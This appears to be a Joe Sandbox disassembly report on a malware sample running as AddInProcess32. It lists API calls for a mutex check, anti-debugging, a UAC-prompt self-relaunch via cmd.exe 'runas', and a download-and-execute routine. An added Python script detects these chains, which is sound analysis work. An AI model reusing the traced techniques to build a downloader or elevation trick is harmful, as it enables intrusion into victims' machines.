                                                                                                            control_flow_graph 246 406830-40684b 247 4068d1-4068d7 246->247 248 406851-40686f call 40a23b 246->248 249 4069c1-4069d0 call 406f60 247->249 250 4068dd-4068e2 247->250 258 406870-406879 248->258 252 4068e4-4068e8 250->252 255 4068f0 252->255 256 4068ea-4068ee 252->256 259 4068f2-4068fe 255->259 256->255 256->259 258->258 260 40687b-40687f 258->260 259->252 261 406900-406902 259->261 262 4068b0-4068c0 GetFileAttributesW 260->262 263 406881-40688c 260->263 264 406904-406920 call 409c70 261->264 265 40693d-406949 261->265 262->247 268 4068c2-4068cb CreateDirectoryW 262->268 266 406893-4068a0 263->266 267 40688e-406891 263->267 272 4069d1-4069ff call 407097 264->272 279 406926-406938 call 406830 264->279 270 406960-40696f 265->270 271 40694b-40695d call 40a23b 265->271 266->272 273 4068a6-4068a8 266->273 267->262 267->266 268->247 274 406970-406979 270->274 271->270 286 406a01-406a0b 272->286 287 406a54-406a63 272->287 273->262 274->274 278 40697b-4069b0 call 40a23b GetFileAttributesW 274->278 278->249 288 4069b2-4069bb CreateDirectoryW 278->288 279->265 286->287 291 406a0d-406a12 286->291 289 406a65-406a7a call 406f60 287->289 290 406a7d-406a80 287->290 288->249 292 406a82-406a84 290->292 293 406ab8-406abd 290->293 291->287 295 406a14-406a18 291->295 292->293 296 406a86-406ab5 call 405540 292->296 297 406b13-406b30 call 406120 293->297 298 406abf 293->298 300 406a23-406a2d 295->300 301 406a1a-406a20 call 40c52b 295->301 296->293 315 406b32-406b35 297->315 316 406b6e-406b7e 297->316 307 406ac0-406ac2 298->307 304 406a37-406a4d call 40c52b 300->304 305 406a2f-406a32 call 4047e0 300->305 301->300 304->287 305->304 313 406ac4-406ac8 307->313 314 406b0c-406b11 307->314 313->314 318 406aca-406ad1 313->318 314->297 314->307 319 406b50 315->319 320 406b37-406b3a 315->320 322 406b80-406b84 316->322 323 406b9e-406bb5 call 40a23b 316->323 318->314 321 406ad3-406b09 call 405540 318->321 326 406b52-406b6b call 406830 call 406f60 319->326 320->319 324 406b3c-406b3f 320->324 321->314 328 406b91-406b94 322->328 329 406b86-406b8a 322->329 337 406bc2-406bce 323->337 338 406bb7-406bc0 323->338 332 406b41-406b46 324->332 333 406b48-406b4e 324->333 331 406b96-406b9c 328->331 329->328 330 406b8c-406b8f 329->330 330->331 331->322 331->323 332->319 332->333 333->326 341 406dc4-406dc9 call 407097 337->341 342 406bd4-406be9 337->342 340 406c00-406c23 call 4027b0 338->340 355 406c43-406c79 call 406830 CreateFileW 340->355 344 406c25-406c41 call 4027b0 342->344 345 406beb-406bef 342->345 344->355 345->344 350 406bf1-406bf4 345->350 350->340 354 406bf6-406bfe 350->354 354->340 354->344 358 406c93-406ca7 call 405b70 355->358 359 406c7b-406c90 call 406f60 355->359 364 406ca9-406cb6 call 4071b0 358->364 365 406cbc-406cbe 358->365 364->365 367 406cc0-406ce1 call 405d40 365->367 371 406d23 367->371 372 406ce3-406ce5 367->372 375 406d28-406d2c 371->375 373 406d15-406d1a 372->373 374 406ce7 372->374 373->375 376 406d09-406d0f 374->376 377 406ce9-406d07 WriteFile 374->377 378 406d2e-406d33 375->378 379 406d6f-406d71 375->379 376->375 381 406d11-406d13 376->381 377->376 380 406d1c-406d21 377->380 378->379 384 406d35-406d39 378->384 382 406da1-406dc1 CloseHandle call 406f60 379->382 383 406d73-406d96 SetFileTime CloseHandle 379->383 380->375 381->367 381->373 383->382 386 406d44-406d4e 384->386 387 406d3b-406d41 call 40c52b 384->387 388 406d50-406d53 call 4047e0 386->388 389 406d58-406d68 call 40c52b 386->389 387->386 388->389 389->379
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 004068B7
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 004068CB
                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 004069A7
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 004069BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                            • String ID: Pl@
                                                                                                            • API String ID: 3401506121-745116313
                                                                                                            • Opcode ID: 2f29e6726891c44616fa55043902484a068493e373541bd7c6d0d08ede89516c
                                                                                                            • Instruction ID: ec1f5b360a55acec7d882f1d6c8891c8c9af4486f23bb7fef10e4ffc5149fcb3
                                                                                                            • Opcode Fuzzy Hash: 2f29e6726891c44616fa55043902484a068493e373541bd7c6d0d08ede89516c
                                                                                                            • Instruction Fuzzy Hash: 4451FAB190021857CB20EF69D885AEBB3A8EF44310F15467FE916E72C1EB349E64CB59

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 396 402710-402727 call 401000 399 402785-402788 396->399 400 402729-402742 CreateMutexW GetLastError 396->400 401 402744-402749 400->401 402 40277d-40277f ExitProcess 400->402 403 402754-402765 call 401420 401->403 404 40274b-402752 call 4024b0 401->404 408 40276a-402772 403->408 404->403 409 40278b-402790 call 402520 404->409 408->402 410 402774-402778 call 401860 408->410 410->402
                                                                                                            APIs
                                                                                                              • Part of subcall function 00401000: lstrcmpA.KERNEL32(00000000,?), ref: 004010A2
                                                                                                              • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000008,?), ref: 004010C7
                                                                                                              • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 004010CE
                                                                                                              • Part of subcall function 00401000: lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 004010EC
                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00402731
                                                                                                            • GetLastError.KERNEL32 ref: 00402737
                                                                                                            • ExitProcess.KERNEL32 ref: 0040277F
                                                                                                              • Part of subcall function 004024B0: GetCurrentProcess.KERNEL32(00000008,?), ref: 004024CC
                                                                                                              • Part of subcall function 004024B0: OpenProcessToken.ADVAPI32(00000000), ref: 004024D3
                                                                                                              • Part of subcall function 004024B0: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004024F3
                                                                                                              • Part of subcall function 004024B0: CloseHandle.KERNEL32(?), ref: 00402502
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$HeapToken$AllocCloseCreateCurrentErrorExitHandleInformationLastMutexOpenlstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2480484397-0
                                                                                                            • Opcode ID: 7ed43953da3f1d17e2b94cd265ab11a27986ec2db529bb376a53c88e9eace196
                                                                                                            • Instruction ID: cabc20e52d63fbaf5835a872110fa228d1b8c25b3e59d728fc3075fda0be40b5
                                                                                                            • Opcode Fuzzy Hash: 7ed43953da3f1d17e2b94cd265ab11a27986ec2db529bb376a53c88e9eace196
                                                                                                            • Instruction Fuzzy Hash: BD01D6301083019BDB14AF51DD0DB6EB791AF84345F00893EF994621E0EBB88954C7AB

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 414 40d8f2-40d8fd 415 40d90b-40d911 414->415 416 40d8ff-40d909 414->416 418 40d913-40d914 415->418 419 40d92a-40d93b RtlAllocateHeap 415->419 416->415 417 40d93f-40d94a call 40dc32 416->417 424 40d94c-40d94e 417->424 418->419 420 40d916-40d91d call 40d247 419->420 421 40d93d 419->421 420->417 427 40d91f-40d928 call 40c57b 420->427 421->424 427->417 427->419
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,7591F380,00000000,?,0040F219,00000001,00000364,00000000,00000006,000000FF,?,0040718C,00000000,?,00406E07,0000044C), ref: 0040D933
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 0e19913d1ecff6e60680035eae04c32c323cb32b047577f130201fc95c97fb0b
                                                                                                            • Instruction ID: 3b163e85c33e1a3503c65bd554a4f98c0f2ee5239ac5b29bff1cde8fd44bdab8
                                                                                                            • Opcode Fuzzy Hash: 0e19913d1ecff6e60680035eae04c32c323cb32b047577f130201fc95c97fb0b
                                                                                                            • Instruction Fuzzy Hash: F0F0B472E01124A6DB225EE29C05B6B3B58AF81760B148177E804B72D4CA38DD0986AC

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 430 40dc7f-40dc8b 431 40dcbd-40dcc8 call 40dc32 430->431 432 40dc8d-40dc8f 430->432 439 40dcca-40dccc 431->439 434 40dc91-40dc92 432->434 435 40dca8-40dcb9 RtlAllocateHeap 432->435 434->435 436 40dc94-40dc9b call 40d247 435->436 437 40dcbb 435->437 436->431 442 40dc9d-40dca6 call 40c57b 436->442 437->439 442->431 442->435
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,0040718C,00000000,?,00406E07,0000044C,A2C859C2,7591F380,00000000,00000000,000000FF,?,004014D5), ref: 0040DCB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 03c37d2a1fd8ff6a03587279802e86b92029074b3fd401b0eb709b4195d61d0d
                                                                                                            • Instruction ID: 1c94c52fd2da5dd860f1ac26d2e848129022307c2b84a0b6717adfd0f47dcc89
                                                                                                            • Opcode Fuzzy Hash: 03c37d2a1fd8ff6a03587279802e86b92029074b3fd401b0eb709b4195d61d0d
                                                                                                            • Instruction Fuzzy Hash: F5E06531D4822457FA2137EA9C04B5B7A589F417B4F150177EC16B62D0CBBCDC0AC1AD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                                                                            • Instruction ID: 6d4369275cd833c3962ce4f0f9f5d870733270a8750b4c026c80256ecd2f67c0
                                                                                                            • Opcode Fuzzy Hash: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                                                                            • Instruction Fuzzy Hash: 26024D71E002199BDF14CFA9CA806EEFBB1FF48314F24826AD519E7380D775A991CB94
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00407890
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0040795C
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407975
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040797F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                            • String ID:
                                                                                                            • API String ID: 254469556-0
                                                                                                            • Opcode ID: 02910537eba6cd405f4cd1a7db5889c65aee9def55af4774f4fbecb6b8f9ad63
                                                                                                            • Instruction ID: eade7b54685adbf1ecf20fd789ded79bced50c1eba4a3a40bacbfb91bb774348
                                                                                                            • Opcode Fuzzy Hash: 02910537eba6cd405f4cd1a7db5889c65aee9def55af4774f4fbecb6b8f9ad63
                                                                                                            • Instruction Fuzzy Hash: 0031FA75D052189BDF20EF65D949BCDBBB8AF08304F1041AAE40DA7290EB749B84CF49
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0040DA70
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040DA7A
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040DA87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 9ed16ef9779c02d6e7f4fb2c8675fdadbdadcb388720d3868958c3f84562015f
                                                                                                            • Instruction ID: c7764d1188791cd03cf770f2f04546622c67af5315fd6fbd065365adde8131cf
                                                                                                            • Opcode Fuzzy Hash: 9ed16ef9779c02d6e7f4fb2c8675fdadbdadcb388720d3868958c3f84562015f
                                                                                                            • Instruction Fuzzy Hash: AF31D674D012189BCB21DF68DD88BCDBBB8BF08310F5041EAE41CA6290EB749F858F49
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00407B5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                            • String ID:
                                                                                                            • API String ID: 2325560087-0
                                                                                                            • Opcode ID: b3cd3010069134bdc06a26e374721fbc531fc9ea41cd9c4665c6601caa254926
                                                                                                            • Instruction ID: 58ffa6e5a28285f7a82ae90fda48af03ad9a69f9ab68bac074e952613a0c915f
                                                                                                            • Opcode Fuzzy Hash: b3cd3010069134bdc06a26e374721fbc531fc9ea41cd9c4665c6601caa254926
                                                                                                            • Instruction Fuzzy Hash: DB516A71E08205ABEB28CF59D9817AEB7F0FB88350F24843AC401EB390D3B8A941CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f2ad18ca5c3d4d14ae8de392ef5d2c438218ed5be53967046802c2e44fbb3421
                                                                                                            • Instruction ID: eae7a6d73dca6622784a838d1c93183e6f7f5f6df23da42e9fec07ca66b2767c
                                                                                                            • Opcode Fuzzy Hash: f2ad18ca5c3d4d14ae8de392ef5d2c438218ed5be53967046802c2e44fbb3421
                                                                                                            • Instruction Fuzzy Hash: 8F31E872A00219BFDB30DFB9CC84EAB777DEB84314F144179F805A7280E6349E448B54
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00007A1D,00407271), ref: 00407A16
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 44269f2e51ee6e50175b1f6b701cc95c6819a78785e7297dcbae5f3461c54587
                                                                                                            • Instruction ID: 745af6bd67f1f6922f24c1edbd32b4250088bcabdc2796110c06f40ed49b9581
                                                                                                            • Opcode Fuzzy Hash: 44269f2e51ee6e50175b1f6b701cc95c6819a78785e7297dcbae5f3461c54587
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00402534
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040253D
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0040254A
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000026A), ref: 00402557
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040255A
                                                                                                            • wsprintfW.USER32 ref: 00402567
                                                                                                            • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000,00000000,00000000), ref: 00402587
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00402593
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040259C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004025A1
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004025A4
                                                                                                            • ExitProcess.KERNEL32 ref: 004025A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree$ExecuteExitFileModuleNameShellwsprintf
                                                                                                            • String ID: /c "%s"$cmd.exe$runas
                                                                                                            • API String ID: 3385381366-213241364
                                                                                                            • Opcode ID: dd824fdd94ba376a0c3559ff4f8246cb293e2107b4e837f293defc75e496ff9b
                                                                                                            • Instruction ID: 441fa4a2bb8c3f1e8e22662644751f9d018fb7d5a55d2b99290a6bc814c1ff6f
                                                                                                            • Opcode Fuzzy Hash: dd824fdd94ba376a0c3559ff4f8246cb293e2107b4e837f293defc75e496ff9b
                                                                                                            • Instruction Fuzzy Hash: 7D014F71E803147BF61067E29D5EF9B7E6CFB48B91F104011F708A71D0C9B45D40CA69
                                                                                                            APIs
                                                                                                              • Part of subcall function 004025B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 004025E1
                                                                                                              • Part of subcall function 004025B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004025FB
                                                                                                              • Part of subcall function 004025B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00402644
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0040265A
                                                                                                              • Part of subcall function 004025B0: HeapAlloc.KERNEL32(00000000), ref: 0040265D
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 004026AA
                                                                                                              • Part of subcall function 004025B0: RtlAllocateHeap.NTDLL(00000000), ref: 004026AD
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004026D7
                                                                                                              • Part of subcall function 004025B0: RtlFreeHeap.NTDLL(00000000), ref: 004026DA
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026E6
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026F3
                                                                                                            • GetProcessHeap.KERNEL32(00000000,0000020A), ref: 004018A0
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004018A3
                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000), ref: 004018B6
                                                                                                              • Part of subcall function 00406DD0: GetCurrentDirectoryW.KERNEL32(00000103,00000244,?,?,?,00000000,000000FF), ref: 00406E5D
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 00401989
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040198C
                                                                                                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 004019AA
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,00000000,00000000), ref: 00401A1A
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00401A2A
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00401A36
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00401A45
                                                                                                            • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 00401A48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Internet$CloseHandle$Alloc$FreeOpenPath$AllocateCombineCreateCurrentDirectoryFileFolderReadSpecial
                                                                                                            • String ID: D$Pst^t
                                                                                                            • API String ID: 2613224297-4293525912
                                                                                                            • Opcode ID: f45c2ff5cb1f318ad88f7d26c71e491d3b541212b48ab92155e39b477564583e
                                                                                                            • Instruction ID: fd4bbc4ba79f2eb052b05b6cd251ed72691743f5e14ceb61becbe3eb516d8304
                                                                                                            • Opcode Fuzzy Hash: f45c2ff5cb1f318ad88f7d26c71e491d3b541212b48ab92155e39b477564583e
                                                                                                            • Instruction Fuzzy Hash: 1751B371A012189BDB20AF60CC59BAA7778FF44700F1041BAF54ABB2E0DB789D40CF59
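The two records above are the behaviourally interesting ones in this stretch of the dump: the function at 00402534..004025A8 resolves its own path (GetModuleFileNameW), formats it with the "/c "%s"" string and hands cmd.exe to ShellExecuteW with the "runas" verb, i.e. a self-relaunch behind a UAC consent prompt followed by ExitProcess; the function at 004018A0..00401A48 reads a URL through WinINet, picks a drop directory with SHGetSpecialFolderPathW (CSIDL 0x23) and starts the result with CreateProcessW. As an added example, not part of the Joe Sandbox report and not code from the sample, the Python below parses this "APIs" listing format and flags both chains. The SAMPLE_* inputs are excerpts copied from the two records; the CSIDL and creation-flag names are standard Windows SDK constants that the report itself does not decode, and because Joe Sandbox prints a stack snapshot rather than a typed argument list, only the leading slots are trusted.

```python
"""Parse Joe Sandbox 'APIs' rows and flag suspicious API chains.
Added example, not Joe Sandbox code and not code from the analysed sample.
SAMPLE_* are excerpts constructed from the two function records above."""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"                                       # optional bullet
    r"(?:Part of subcall function ([0-9A-Fa-f]{8}):\s*)?"  # nested-call prefix
    r"([^\s.()]+)\.([A-Za-z0-9_]+)"                        # Name.MODULE
    r"(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})\s*$"       # (args), ref: call site
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                 # call-site address inside the dumped image
    subcall: Optional[str]   # enclosing 'Part of subcall function' address, if any

@dataclass
class Finding:
    kind: str
    ref: str
    detail: str

# Standard Windows SDK values (ShlObj.h / WinBase.h); only the ones needed here.
CSIDL = {0x07: "CSIDL_STARTUP", 0x18: "CSIDL_COMMON_STARTUP", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",  # C:\ProgramData
         0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES"}
CREATION_FLAGS = {0x1: "DEBUG_PROCESS", 0x2: "DEBUG_ONLY_THIS_PROCESS",
                  0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS",
                  0x10: "CREATE_NEW_CONSOLE", 0x200: "CREATE_NEW_PROCESS_GROUP",
                  0x400: "CREATE_UNICODE_ENVIRONMENT",
                  0x80000: "EXTENDED_STARTUPINFO_PRESENT", 0x08000000: "CREATE_NO_WINDOW"}

def hexarg(s: str) -> Optional[int]:
    """Joe Sandbox prints unresolved stack slots as '?'; decode only real hex values."""
    try:
        return int(s, 16)
    except ValueError:
        return None

def csidl_name(value: int) -> str:
    return CSIDL.get(value, f"CSIDL_0x{value:02X}")

def decode_creation_flags(value: int) -> List[str]:
    return [name for bit, name in CREATION_FLAGS.items() if value & bit]

def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # 'APIs' / 'Strings' headers and non-API rows are skipped
        subcall, name, module, argstr, ref = m.groups()
        args = [a.strip() for a in argstr.split(",")] if argstr else []
        calls.append(ApiCall(name, module, args, ref.upper(), subcall))
    return calls

def find_chains(calls: List[ApiCall]) -> List[Finding]:
    names = {c.name for c in calls}
    out: List[Finding] = []
    for c in calls:
        # Own path formatted into a command line and run via ShellExecuteW "runas":
        # a self-relaunch behind a UAC consent prompt.
        if c.name == "ShellExecuteW" and len(c.args) >= 3 and c.args[1] == "runas":
            kind = "uac_prompt_relaunch" if "GetModuleFileNameW" in names else "uac_prompt_exec"
            out.append(Finding(kind, c.ref, f"ShellExecuteW verb=runas file={c.args[2]}"))
        # WinINet read feeding CreateProcessW, drop directory chosen by CSIDL.
        if c.name == "SHGetSpecialFolderPathW" and len(c.args) >= 3:
            csidl = hexarg(c.args[2])
            if csidl is not None and {"InternetReadFile", "CreateProcessW"} <= names:
                out.append(Finding("download_exec", c.ref, f"drop dir {csidl_name(csidl)}"))
        # Sixth slot of CreateProcessW is dwCreationFlags (stack snapshot, leading slots only).
        if c.name == "CreateProcessW" and len(c.args) >= 6:
            flags = hexarg(c.args[5])
            if flags is not None:
                desc = "|".join(decode_creation_flags(flags)) or f"0x{flags:X}"
                out.append(Finding("create_process", c.ref, f"creation flags {desc}"))
    return out

# Constructed excerpts of the two records above.
SAMPLE_RELAUNCH = """\
• GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00402534
• HeapAlloc.KERNEL32(00000000), ref: 0040253D
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0040254A
• wsprintfW.USER32 ref: 00402567
• ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000,00000000,00000000), ref: 00402587
• ExitProcess.KERNEL32 ref: 004025A8
"""
SAMPLE_DOWNLOADER = """\
  • Part of subcall function 004025B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 004025E1
  • Part of subcall function 004025B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004025FB
  • Part of subcall function 004025B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00402644
• SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000), ref: 004018B6
• PathCombineW.SHLWAPI(00000000,?,?), ref: 004019AA
• CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,00000000,00000000), ref: 00401A1A
• CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00401A2A
"""

if __name__ == "__main__":
    for sample in (SAMPLE_RELAUNCH, SAMPLE_DOWNLOADER):
        for f in find_chains(parse_api_lines(sample)):
            print(f"{f.ref}  {f.kind:22s} {f.detail}")
```

Running it over the two excerpts yields one "uac_prompt_relaunch" finding at 00402587 and, for the downloader, a "download_exec" finding resolving 0x23 to CSIDL_COMMON_APPDATA plus a "create_process" finding decoding the 0x8 slot as DETACHED_PROCESS. The same parser can be pointed at any other "APIs" record on this page; rows that do not fit the Name.MODULE(...), ref: pattern are ignored rather than mis-parsed.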
                                                                                                            APIs
                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00408DDA
                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00408EE8
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0040903A
                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00409055
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                            • String ID: csm$csm$csm
                                                                                                            • API String ID: 2751267872-393685449
                                                                                                            • Opcode ID: 8e68faa92370a965529a53a4b1aa1c85c9262d97b1e5eff1d9fa127d797ae8c1
                                                                                                            • Instruction ID: 7b7edcd1b472d616056aaf9ca5440520e9f3ce2695b85cf96550e61ac8a8a294
